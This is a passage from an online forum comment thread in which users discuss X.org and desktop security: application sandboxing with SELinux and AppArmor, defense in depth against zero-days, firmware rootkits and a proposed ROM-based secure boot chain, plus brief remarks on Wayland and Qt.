Strictly speaking, we already have that capability in SELinux or in AppArmor. The reason it's not really heavily implemented is because you might want your web browser to be able to save a file in your mail directory or overwrite your local .bashrc from a server stored copy somewhere. Meanwhile, sticking all the UI stuff to allow/disallow isn't some magic bullet...

Oh, I agree. The problem is that nobody has figured out a good model for app-level security that isn't extremely inconvenient.

However, I still think the status quo is really insecure. The fact that nobody has come up with something that works better doesn't change that. Sure, if your browser doesn't contain an exploit then you don't need the extra security, but if you want security then you really need defense in depth.

I think something that the NSA has recently demonstrated is that a lot of software contains zero-days known to very few. The more defense in depth you have, the harder it is to exploit your systems. If you're relying only on perimeter security then you're up the creek when somebody breaches it. Of course, the fact that they're sticking rootkits in the firmware also points to the fact that you need to control the bootstrap from a known-good state. What we really need is secure boot that starts from a trustworthy FOSS loader implemented in ROM that verifies and proceeds into flash for UEFI, and then verifies/loads the OS. Maybe store the ROM's verification certificate in flash which is protected against writing by a hardware switch (that way you can install your own UEFI and configure its trust settings). Of course, all of this only works if you trust your hardware vendor.

However, this might be a bit of a pipe dream. Linux has had Trusted Grub for eons and who uses that?

Re:Broken by design (0)

Anonymous Coward | about 3 months ago | (#45834905)

Then you don't know much about Wayland, do you? The source and protocol specifications are already there for you to look at, rather than make retarded claims.

Not just X.org (2)

Wonko the Sane (25252) | about 4 months ago | (#45833867)

Based on the Qt team's complete lack of willingness to fix security bugs apparently when you render with Qt, you're rendering with the NSA.

Isn't This The Way? (0)

Anonymous Coward | about 3 months ago | (#45834575)

Isn't this how FOSS is supposed to work?

Now security issues will be examined and fixed.

Re:Isn't This The Way? (0)

Anonymous Coward | about 3 months ago | (#45835319)

Many of X's bugs are actually features and fixing them will break it. So don't mess with the house of cards, and it may all come crashing down.